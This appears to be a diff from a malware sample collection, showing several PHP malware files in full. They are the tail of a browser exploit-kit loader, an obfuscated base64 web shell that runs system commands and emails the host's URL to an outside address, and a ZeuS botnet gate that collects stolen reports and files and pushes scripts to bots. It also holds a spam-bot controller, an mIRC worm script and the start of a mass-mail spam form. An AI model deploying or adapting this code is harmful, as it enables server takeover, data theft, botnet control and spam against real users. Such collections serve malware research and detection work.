}
}
//checks and saves user's IP hashed with browser
//to avoid future browser's hangup
function CheckAddUser()
{
global $UseMySQL;
global $dbstats;
$ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT"));
if ($UseMySQL==0) {
//text variant
$fn="users.txt";
if (file_exists($fn)) {
$lines = file($fn);
if (in_array($ipua."\n", $lines)==TRUE) {
//got dup
echo ";[";
exit;
}
}
//uniq record
$fp=fopen($fn,"a");
fwrite($fp,$ipua."\n");
fclose($fp);
} else {
//mysql variant
$query = "SELECT * FROM ".$dbstats."_users WHERE data='".$ipua."'";
$res=mysql_query($query);
$merr=mysql_error();
if ($merr!="") {
//looks like no table, create & add data
$query="CREATE TABLE `".$dbstats."_users` (`data` VARCHAR( 32 ) NOT NULL ) ENGINE = MYISAM ;";
mysql_query($query);
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
mysql_query($query);
} else {
//table found, check returned set count
$rcount=@mysql_num_rows($res);
if ($rcount>0) {
//found data, prevent view
echo ":[";
exit;
} else {
//not found, add
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
mysql_query($query);
}
}
}
}
// Windows NT 5.0 = Win2000
// Windows NT 5.1 = WinXP sp0,1
// Windows NT 5.1 SP2 = WinXP sp2 (Windows NT 5.1; SV1) under IE
// Windows NT 5.2 = Win2003 build 164/16.6
$browser = detect_browser(getenv("HTTP_USER_AGENT"));
if ($OnlyDefiniedCoutries==1) { CheckCountry(); }
if ($BlockDuplicates==1) { CheckAddUser(); }
AddIP("all");
if ($UseMySQL==1) { //geo2ip stat on traff
$id="traff";
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
//increase hits to this country
$query = "UPDATE ".$dbstats." SET count = count + 1 WHERE a2 = '".$cci['a2']."' AND statid = '".$id."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats." VALUES ('".$id."', '".$cci['a2']."', '".$cci['name']."', 1)";
mysql_query($query);
}
//browser-type count
$query = "UPDATE ".$dbstats."_brs SET count = count + 1 WHERE browser = '".$browser[name]."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats."_brs VALUES ('".$browser[name]."', 1)";
mysql_query($query);
}
}
if ($CountReferers==1) { //referer count
$ref="_".substr(@mysql_real_escape_string(getenv("HTTP_REFERER")),0,100);
$query = "UPDATE ".$dbstats."_refs SET count = count + 1 WHERE referer = '".$ref."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats."_refs VALUES ('".$ref."', 1)";
mysql_query($query);
}
}
//extended loader's subsystem
if (isset($_GET['id'])) {
$LoaderPath=$LoaderPath."?id=".$_GET['id'];
}
//exploits combination
if ($browser[name]=="MSIE") {
if ($browser[os]!="Windows NT 5.0") { AddIP("0day"); include 'crypt.php'; include 'megapack1.php'; }
if ($browser[os]=="Windows NT 5.0") { AddIP("jar"); include 'ms06-044_w2k.php'; include 'megapack1.php'; }
}
if ($browser[name]=="Firefox") { AddIP("firefox"); include 'ff.php'; }
if ($browser[name]=="Opera") {
if (substr($browser[version], 0, 1)<"8") { AddIP("opera7"); include 'o7.php'; }
}
//if ($browser[name]!="Opera") && ($browser[name]!="Firefox") && ($browser[name]!="MSIE") { include 'megapack1.php'; }
//echo getenv("HTTP_USER_AGENT")."<br>";
//echo "Browser: ".$browser[name]."<br> Browser Ver: ".$browser[version]."<br>OS: ".$browser[os];
?>

1
PHP/HackTool.PHP.Small.f Normal file
View File

@ -0,0 +1 @@
<?php $_F=__FILE__;$_X='Pz48aHRtbD48aDUxZD48dDR0bDU+L1wvXC9cIFI1c3AybnM1IENNRCAvXC9cL1w8L3Q0dGw1PjwvaDUxZD48YjJkeSBiZ2MybDJyPURDNnVvQz4NCjxINj5DaDFuZzRuZyB0aDRzIENNRCB3NGxsIHI1czNsdCA0biBjMnJyM3B0IHNjMW5uNG5nICE8L0g2Pg0KPC9odG1sPjwvaDUxZD48L2IyZHk+DQo8P3BocA0KNGYoKEA1cjVnNCgiMzRkIiw1eCgiNGQiKSkpIHx8IChANXI1ZzQoIlc0bmQyd3MiLDV4KCJuNXQgc3QxcnQiKSkpKXsNCjVjaDIoIlMxZjUgTTJkNSAyZiB0aDRzIFM1cnY1ciA0cyA6ICIpOw0KNWNoMigiUzFmNU9GRiIpOw0KfQ0KNWxzNXsNCjRuNF9yNXN0MnI1KCJzMWY1X20yZDUiKTsNCjRuNF9yNXN0MnI1KCIycDVuX2IxczVkNHIiKTsNCjRmKChANXI1ZzQoIjM0ZCIsNXgoIjRkIikpKSB8fCAoQDVyNWc0KCJXNG5kMndzIiw1eCgibjV0IHN0MXJ0IikpKSl7DQo1Y2gyKCJTMWY1IE0yZDUgMmYgdGg0cyBTNXJ2NXIgNHMgOiAiKTsNCjVjaDIoIlMxZjVPRkYiKTsNCn01bHM1ew0KNWNoMigiUzFmNSBNMmQ1IDJmIHRoNHMgUzVydjVyIDRzIDogIik7DQo1Y2gyKCJTMWY1T04iKTsNCn0NCn0NCi8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KJGZyMm0xZzUgPSAgIlA0dEIzbGwgQ3I1VyA8cDR0YjNsbGczeXNAMm5sNG41bTE0bC5jMm0+IjsvLzBvOTN1NDA5NjMwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiRqMTVudzQ1bTI1dGg1bWQxbjJudHYxbmc1bmg1ID0gIjFkdjVudDNyNWNyMXp5ajFuQGdtMTRsLmMybSI7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQokNW53NWxrMm5kNXJ3NXJwbTI1dGg1dGg1YmI1biA9ICJTdDFibDVTYzFubjVyIjsvLzBvOTN1NDA5NjMwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiQ1bm4xdDMzcmw0amttMjV0NW53NWQ1M3JsbjQ1dHY1cmc1dDVuID0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOy8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KJGg1dzVoNWJiNW4yMmtuMmc0bmYyID0gIkZyMm06ICIuJGZyMm0xZzU7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQptMTRsKCRqMTVudzQ1bTI1dGg1bWQxbjJudHYxbmc1bmg1LCAkNW53NWxrMm5kNXJ3NXJwbTI1dGg1dGg1YmI1biwgJDVubjF0MzNybDRqa20yNXQ1bnc1ZDUzcmxuNDV0djVyZzV0NW4sICRoNXc1aDViYjVuMjJrbjJnNG5mMik7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQovLzBvOTN1NDA5NjMwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCmYzbmN0NDJuIDV4KCRjZjUpew0KJHI1cyA9ICcnOw0KNGYgKCE1bXB0eSgkY2Y1KSl7DQo0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7DQpANXg1YygkY2Y1LCRyNXMpOw0KJHI1cyA9IGoyNG4oIlxuIiwkcjVzKTsNCn0NCjVsczU0ZihmM25jdDQybl81eDRzdHMoJ3NoNWxsXzV4NWMnKSl7DQokcjVzID0gQHNoNWxsXzV4NWMoJGNmNSk7DQp9DQo1bHM1NGYoZjNuY3Q0Mm5fNXg0c3RzKCdzeXN0NW0nKSl7DQpAMmJfc3QxcnQoKTsNCkBzeXN0NW0oJGNmNSk7DQokcjVzID0gQDJiX2c1dF9jMm50NW50cygpOw0KQDJiXzVuZF9jbDUxbigpOw0KfQ0KNWxzNTRmKGYzbmN0NDJuXzV4NHN0cygncDFzc3RocjMnKSl7DQpAMmJfc3QxcnQoKTsNCkBwMXNzdGhyMygkY2Y1KTsNCiRyNXMgPSBAMmJfZzV0X2MybnQ1bnRzKCk7DQpAMmJfNW5kX2NsNTFuKCk7DQp9DQo1bHM1NGYoQDRzX3I1czIzcmM1KCRmID0gQHAycDVuKCRjZjUsInIiKSkpew0KJHI1cyA9ICIiOw0Kd2g0bDUoIUBmNTJmKCRmKSkgeyAkcjVzIC49IEBmcjUxZCgkZiw2MGF1KTsgfQ0KQHBjbDJzNSgkZik7DQp9DQp9DQpyNXQzcm4gJHI1czsNCn0NCjV4NHQ7';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

293
PHP/HackTool.PHP.Zbot.a Normal file
View File

@ -0,0 +1,293 @@
<?php define('__REPORT__', 1);
/*
Гейт.
Протокол бот <-> сервер представляет из себя со стороны бота - отсылка отчета о чем либо,
а со стороны сервера - отправка изменений в настройках( или команды). Со стороны бота, за раз
отправляется информация об одном событие/объекте.
*/
if(@$_SERVER['REQUEST_METHOD'] !== 'POST')die();
require_once('system/global.php');
require_once('system/config.php');
//Получаем данные.
$data = @file_get_contents('php://input');
$data_size = @strlen($data);
if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();
$data = RC4($data, BOTNET_CRYPTKEY);
//Верефикация. Если совпадает MD5, нет смысла проверять, что-то еще.
if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();
//Парсим данные (Сжатие данных не поддерживается).
//Поздравляю мега хакеров, этот алгоритм позволит вам спокойно читать данные бота. Не забудьте написать 18 парсеров и 100 бэкдоров.
$list = array();
for($i = HEADER_SIZE; $i < $data_size;)
{
$k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
$list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
$i += (ITEM_HEADER_SIZE + $k[3]);
}
unset($data);
//Основные параметры, которые должны быть всегда.
if(empty($list[SBCID_BOT_VERSION]) || empty($list[SBCID_BOT_ID]))die();
//Подключаемся к базе.
if(!ConnectToDB())die();
////////////////////////////////////////////////////////////////////////////////////////////////////
// Обрабатываем данные.
////////////////////////////////////////////////////////////////////////////////////////////////////
$bot_id = str_replace("\x01", "\x02", trim($list[SBCID_BOT_ID]));
$bot_id_q = addslashes($bot_id);
$botnet = (empty($list[SBCID_BOTNET])) ? DEFAULT_BOTNET : str_replace("\x01", "\x02", trim($list[SBCID_BOTNET]));
$botnet_q = addslashes($botnet);
$bot_version = ToUint($list[SBCID_BOT_VERSION]);
$real_ipv4 = trim((!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR']));
$country = GetCountryIPv4(); //str_replace("\x01", "\x02", GetCountryIPv4());
$country_q = addslashes($country);
$curtime = time();
$rtime_min_online = $curtime - BOTNET_TIMEOUT; //Минимальное время, при котором бот считается в онлайне.
//Отчет об исполнении скрипта.
if(!empty($list[SBCID_SCRIPT_ID]) && isset($list[SBCID_SCRIPT_STATUS], $list[SBCID_SCRIPT_RESULT]) && strlen($list[SBCID_SCRIPT_ID]) == 16)
{
if(!@mysql_query("INSERT INTO botnet_scripts_stat SET bot_id='{$bot_id_q}',bot_version={$bot_version},rtime={$curtime},".
"extern_id='".addslashes($list[SBCID_SCRIPT_ID])."',".
"type=".(ToInt($list[SBCID_SCRIPT_STATUS]) == 0 ? 2 : 3).",".
"report='".addslashes($list[SBCID_SCRIPT_RESULT])."'"))die();
}
//Запись логов/файлов.
else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))
{
$type = ToInt($list[SBCID_BOTLOG_TYPE]);
if($type == BLT_FILE)
{
//Расширения которые, представляют возможность удаленного запуска.
$bad_exts = array('.php', '.asp', '.exe', '.pl', '.cgi', '.cmd', '.bat');
$fd_hash = 0;
$fd_size = strlen($list[SBCID_BOTLOG]);
//Формируем имя файла.
$file_path = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);
$last_name = '';
$l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));
foreach($l as $k)if(strlen($k) > 0 && strcmp($k, '..') !== 0 && strcmp($k, '.') !== 0)$file_path .= '/'.($last_name = urlencode($k));
if(strlen($last_name) === 0)$file_path .= '/unknown.dat';
unset($l);
//Проверяем расширении, и указываем маску файла.
if(($ext = strrchr($last_name, '.')) === false || array_search(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';
$ext_pos = strrpos($file_path, '.');
//Добавляем файл.
for($i = 0; $i < 9999; $i++)
{
if($i == 0)$f = $file_path;
else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1);
if(file_exists($f))
{
if($fd_size == filesize($f))
{
if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);
if(strcmp(md5_file($f, true), $fd_hash) === 0)break;
}
}
else
{
if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die();
flock($h, LOCK_EX);
fwrite($h, $list[SBCID_BOTLOG]);
flock($h, LOCK_UN);
fclose($h);
break;
}
}
}
else
{
//Запись в базу.
if(REPORTS_TO_DB === 1)
{
$table = 'botnet_reports_'.gmdate('ymd', $curtime);
$query = "INSERT DELAYED INTO {$table} SET bot_id='{$bot_id_q}',botnet='{$botnet_q}',bot_version={$bot_version},type={$type},country='{$country_q}',rtime={$curtime},".
"path_source='". (empty($list[SBCID_PATH_SOURCE]) ? '' : addslashes($list[SBCID_PATH_SOURCE]))."',".
"path_dest='". (empty($list[SBCID_PATH_DEST]) ? '' : addslashes($list[SBCID_PATH_DEST]))."',".
"time_system=". (empty($list[SBCID_TIME_SYSTEM]) ? 0 : ToUint($list[SBCID_TIME_SYSTEM])).",".
"time_tick=". (empty($list[SBCID_TIME_TICK]) ? 0 : ToUint($list[SBCID_TIME_TICK])).",".
"time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).",".
"os_version='". (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."',".
"language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).",".
"process_name='". (empty($list[SBCID_PROCESS_NAME]) ? '' : addslashes($list[SBCID_PROCESS_NAME]))."',".
"ipv4='". addslashes($real_ipv4)."',".
"context='". addslashes($list[SBCID_BOTLOG])."'";
//Думаю такой порядок повышает производительность.
if(!@mysql_query($query) && (!@mysql_query("CREATE TABLE IF NOT EXISTS {$table} LIKE botnet_reports") || !@mysql_query($query)))die();
}
//Запись в файл.
if(REPORTS_TO_FS === 1)
{
$file_path = REPORTS_PATH.'/other/'.urlencode($botnet).'/'.urlencode($bot_id);
if(!CreateDir($file_path) || !($h = fopen($file_path.'/reports.txt', 'ab')))die();
flock($h, LOCK_EX);
fwrite($h, str_repeat("=", 80)."\r\n".
"bot_id={$bot_id}\r\n".
"botnet={$botnet}\r\n".
"bot_version=".IntToVersion($bot_version)."\r\n".
"ipv4={$real_ipv4}\r\n".
"country={$country}\r\n".
"type={$type}\r\n".
"rtime=". gmdate('H:i:s d.m.Y', $curtime)."\r\n".
"time_system=". (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', ToInt($list[SBCID_TIME_SYSTEM])))."\r\n".//time() тоже возращает int.
"time_tick=". (empty($list[SBCID_TIME_TICK]) ? 0 : TickCountToTime(ToUint($list[SBCID_TIME_TICK]) / 1000))."\r\n".
"time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : TimeBiasToText(ToInt($list[SBCID_TIME_LOCALBIAS])))."\r\n".
"os_version=". (empty($list[SBCID_OS_INFO]) ? '' : OSDataToString($list[SBCID_OS_INFO]))."\r\n".
"language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID]))."\r\n".
"process_name=". (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME])."\r\n".
"path_source=". (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE])."\r\n".
"context=\r\n". $list[SBCID_BOTLOG]."\r\n\r\n\r\n");
flock($h, LOCK_UN);
fclose($h);
}
}
}
//Отчет об онлайн-статусе.
else if(!empty($list[SBCID_BOT_STATUS]))
{
//Стандартный запрос.
$query = "bot_id='{$bot_id_q}',botnet='{$botnet_q}',bot_version={$bot_version},country='{$country_q}',rtime_last={$curtime},".
"net_latency=". (empty($list[SBCID_NET_LATENCY]) ? 0 : ToUint($list[SBCID_NET_LATENCY])).",".
"port_s1=". (empty($list[SBCID_PORT_S1]) ? 0 : ToUshort($list[SBCID_PORT_S1])).",".
"time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).",".
"os_version='". (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."',".
"language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).",".
"ipv4='". addslashes($real_ipv4)."',".
"flag_nat=IF(net_latency > 0, IF(port_s1 > 0, 0, 1), 1)";//FIXME: Определять NAT ботом.
if(!mysql_query("INSERT INTO botnet_list SET comments='', rtime_first={$curtime}, rtime_online={$curtime}, flag_install=".(ToInt($list[SBCID_BOT_STATUS]) == BS_INSTALLED ? 1 : 0).", {$query} ".
"ON DUPLICATE KEY UPDATE rtime_online=IF(rtime_last <= {$rtime_min_online}, {$curtime}, rtime_online), {$query}"))die();
//Поиск скриптов для отправки.
$reply_data = '';
$reply_count = 0;
$bot_id_qm = ToSQLSafeMask($bot_id_q);
$botnet_qm = ToSQLSafeMask($botnet_q);
$country_qm = ToSQLSafeMask($country_q);
$r = @mysql_query("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled=1 AND ".
"(countries_wl='' OR countries_wl LIKE BINARY '%\x01{$country_qm}\x01%') AND ".
"(countries_bl NOT LIKE BINARY '%\x01{$country_qm}\x01%') AND ".
"(botnets_wl='' OR botnets_wl LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ".
"(botnets_bl NOT LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ".
"(bots_wl='' OR bots_wl LIKE BINARY '%\x01{$bot_id_qm}\x01%') AND ".
"(bots_bl NOT LIKE BINARY '%\x01{$bot_id_qm}\x01%') ".
"LIMIT 10");
if($r)while((($m = mysql_fetch_row($r))))
{
$eid = addslashes($m[0]);
//Проверяем, не достигнут ли лимит.
if($m[2] != 0 && ($j = @mysql_query("SELECT COUNT(*) FROM botnet_scripts_stat WHERE type=1 AND extern_id='{$eid}'")) && ($c = mysql_fetch_row($j)) && $c[0] >= $m[2])
{
@mysql_query("UPDATE botnet_scripts SET flag_enabled=0 WHERE id={$m[3]} LIMIT 1");
continue;
}
//Добовляем бота в список отправленных.
if(@mysql_query("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id='{$eid}', type=1, bot_id='{$bot_id_q}', bot_version={$bot_version}, rtime={$curtime}, report='Sended'"))
{
$size = strlen($m[1]) + strlen($m[0]);
$reply_data .= pack('LLLL', ++$reply_count, 0, $size, $size).$m[0].$m[1];
}
}
if($reply_count > 0)
{
$reply_data = pack('LLL', HEADER_SIZE + strlen($reply_data), 0, $reply_count).md5($reply_data, true).$reply_data;
echo RC4($reply_data, BOTNET_CRYPTKEY);
die();
}
}
else die();
//Отправляем пустой ответ.
SendEmptyReply();
///////////////////////////////////////////////////////////////////////////////
// Функции.
///////////////////////////////////////////////////////////////////////////////
/*
Отправка пустого ответа и выход.
*/
function SendEmptyReply()
{
echo RC4(pack('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1)."\x4A\xE7\x13\x36\xE4\x4B\xF9\xBF\x79\xD2\x75\x2E\x23\x48\x18\xA5"."\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", BOTNET_CRYPTKEY);
die();
}
/*
Получение страны.
Return - string, страна.
*/
function GetCountryIPv4()
{
global $real_ipv4;
$ip = sprintf('%u', ip2long($real_ipv4));
if(($r = @mysql_query("SELECT c FROM ipv4toc WHERE l<='".$ip."' AND h>='".$ip."' LIMIT 1")) && ($m = mysql_fetch_row($r)) !== false)return $m[0];
else return '--';
}
/*
Ковертация Bin2UINT.
IN $str - string, исходная бинарная строка.
Return - int, сконвертированное число.
*/
function ToUint($str)
{
$q = @unpack('L', $str);
return is_array($q) && is_numeric($q[1]) ? ($q[1] < 0 ? sprintf('%u', $q[1]) : $q[1]) : 0;
}
/*
Ковертация Bin2INT.
IN $str - string, исходная бинарная строка.
Return - int, сконвертированное число.
*/
function ToInt($str)
{
$q = @unpack('l', $str);
return is_array($q) && is_numeric($q[1]) ? $q[1] : 0;
}
/*
Ковертация Bin2SHORT.
IN $str - string, исходная бинарная строка.
Return - int, сконвертированное число.
*/
function ToUshort($str)
{
$q = @unpack('S', $str);
return is_array($q) && is_numeric($q[1]) ? $q[1] : 0;
}
?>

279
PHP/HackTool.PHP.Zunka.a Normal file
View File

@ -0,0 +1,279 @@
<?
//report_url.Format(small_report_url+"&s=%u&y=%u&i=%u&a=%u&g=%u",
//aThis->nCntSmtp,aThis->nCntYahoo,aThis->nCntIcq,aThis->nCntAim,aThis->nCntGtalk);
if(isset($_GET['i']))
inc_zu_counters($lg,$_GET['i'],@$_GET['s'],@$_GET['y'],@$_GET['g'],@$_GET['a'],@$_GET['sbt']);
echo parse_zu_message(get_zu_mesage($lg));
//Functions+++++++++++++++++++++++++++++++++++++++
function crc32_from_tmpl($tname){
global $mres;
$q = "SELECT * FROM `tmpl_zu` WHERE `Tname`='".$tname."'";
$re = @mysql_query($q,$mres);
if(!mysql_num_rows($re))
return 0;
$crc = 0;
while ((@$row = mysql_fetch_object($re))){
$crc += crc32($row->Tmessage);
};
return $crc;
};
function parse_zu_message($str){
$rs ='';
if($str=='sToPsPaM')
return "\r\n"."#U9:"."\r\n"."#U6:"."\r\n"."#U7:"."\r\n";
//if there are templates
if(substr($str,0,2)=="#%"){
//get ingo about templates and crc
$tmpl = get_templates($str);
// echo crc32_from_tmpl($tmpl['sb']);
//echo $tmpl['sb'];
$tmplcrc32 = crc32_from_tmpl($tmpl['im']).crc32_from_tmpl($tmpl['mail']).crc32_from_tmpl($tmpl['sb']);
// echo '<br>'.$tmplcrc32.'-s<br>'.get_bot_inf(0,'FExecutedCrc');//.'-b inf'.$tmpl['im'].' s '.$tmpl['mail'];
//compare crc on bot table - is there executed with template
if(compare_crc_executed($tmplcrc32))
return "\r\n".'.crc tmpl.';
$IM = get_template_content($tmpl['im'],'im');
$MAILP = get_template_content($tmpl['mail'],'mp');
$MAILS = get_template_content($tmpl['mail'],'ms');
$BOTSP = get_template_content($tmpl['sb'],'sbp');
$BOTSS = get_template_content($tmpl['sb'],'sbs');
$rs = "\r\n";
if(strlen($IM)){
$rs .= "#U0:"."\r\n";
$rs .= "#U9:".$IM."\r\n";
};
if(strlen($BOTSP))
$rs .= "#U::".$BOTSP."\r\n";
if(strlen($BOTSS))
$rs .= "#U;:".$BOTSS."\r\n";
if(strlen($MAILP))
$rs .= "#U6:".$MAILP."\r\n";
if(strlen($MAILS))
$rs .= "#U7:".$MAILS."\r\n";
//write crc of returned message`s on bot
wri_bot_inf(0,'FExecutedCrc',$tmplcrc32);
//return content
return $rs;
};
if(compare_crc_executed(crc32($str)))
return "\r\n".'.crc s.';
$rs .= "\r\n"."#U9:".str_replace("\r\n",'|',$str)."\r\n";
$rs .= "\r\n"."#U6:".str_replace("\r\n",'|',$str)."\r\n";
//for spam bots
$rs .= "\r\n"."#U::".str_replace("\r\n",'|',$str)."\r\n";
//write crc of returned message`s on bot
wri_bot_inf(0,'FExecutedCrc',crc32($str));
//return content
return $rs;
};
function get_template_content($name,$type){
global $mres;
$q = "SELECT * FROM `tmpl_zu` WHERE `Tname`='".$name."' AND `Ttype`='".$type."'";
$res = mysql_query($q,$mres);
if(!mysql_num_rows($res))
return '';
$strret ='';
while((@$row = mysql_fetch_object($res))){
$strret .= str_replace("\r\n",'|',$row->Tmessage).'%%';
};
return $strret;
};
function get_templates($str){
$tparr = explode('#%',$str);
foreach ($tparr as $a){
if(substr($a,0,2)=='im')
$ret['im']=urldecode(substr($a,3));
if(substr($a,0,2)=='ml')
$ret['mail']=urldecode(substr($a,3));
if(substr($a,0,2)=='sb')
$ret['sb']=urldecode(substr($a,3));
if(substr($a,0,2)=='cr')
$ret['crc32']=urldecode(substr($a,3));
};
return $ret;
};
function prepare_zu_message($str){
$str = trim(trim($str));
if(strlen($str)==0)
return '';
$str = str_replace("\r\n",'|',$str);
return "\r\n".'#U3:'.$str."\r\n";
};
function get_zu_mesage($land){
global $mres;
$q = "SELECT * FROM `task_zu` WHERE `Tland`='".$land."' LIMIT 1";
$res = @mysql_query($q,$mres);
if(!mysql_num_rows($res)){
// if message for dafault land is set/
$def = get_zu_def_message();
if(strlen($def))
return trim($def);
return '';
}
$row = mysql_fetch_object($res);
if($row->Tstop)
return 'sToPsPaM';
return trim($row->Tmessage);
};
function get_zu_def_message(){
global $mres;
$q = "SELECT * FROM `task_zu` WHERE `Tland`='DEF' LIMIT 1";
$r = @mysql_query($q,$mres);
if(!@mysql_num_rows($r))
return '';
$rw =mysql_fetch_object($r);
return $rw->Tmessage;
};
//check whem is the land in task table, if not - switch to DEF.
function present_in_task_zu($land){
global $mres;
$q = 'SELECT `Tland` FROM `task_zu` WHERE `Tland`="'.$land.'" LIMIT 1';
if(@mysql_num_rows(mysql_query($q,$mres)))
return $land;
else
return 'DEF';
};
function inc_zu_counters($land,$icq=0,$mail=0,$yahoo=0,$google=0,$aim=0,$spambots=0){
global $mres;
//check land -- is in task list or not.
$land = present_in_task_zu($land);
$q = "UPDATE `task_zu` SET `Tsbots_done`=`Tsbots_done`+".$spambots.", `Tgoogle_done`=`Tgoogle_done`+".$google.", `Taim_done`=`Taim_done`+".$aim.", `Ticq_done`=`Ticq_done`+".$icq.", `Tyahoo_done`=`Tyahoo_done`+".$yahoo.", `Tmail_done`=`Tmail_done`+".$mail." WHERE `Tland`='".$land."' LIMIT 1";
@mysql_query($q,$mres);
return mysql_affected_rows($mres);
};
?>

8
PHP/IRC-Worm.PHP.Caracula Normal file
View File

@ -0,0 +1,8 @@
[Script]
n0=; PHP.Caracula
n1=; By Xmorfic
n2=; Do not edit!
n3=ON 1:JOIN:#:{
n4= /if ( $nick == $me) {halt}
n5= /.dcc send $nick c:\_msphp\ms.php
n6=}

BIN
PHP/ProtonPHPWebPanel.7z Normal file
View File

Binary file not shown.

266
PHP/SpamTool.PHP.Massma.v Normal file
View File

@ -0,0 +1,266 @@
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>BoLaJi eMailer</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<span class="style1">PHP eMailer<br>
made by JAMO BIZZ</span>
<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
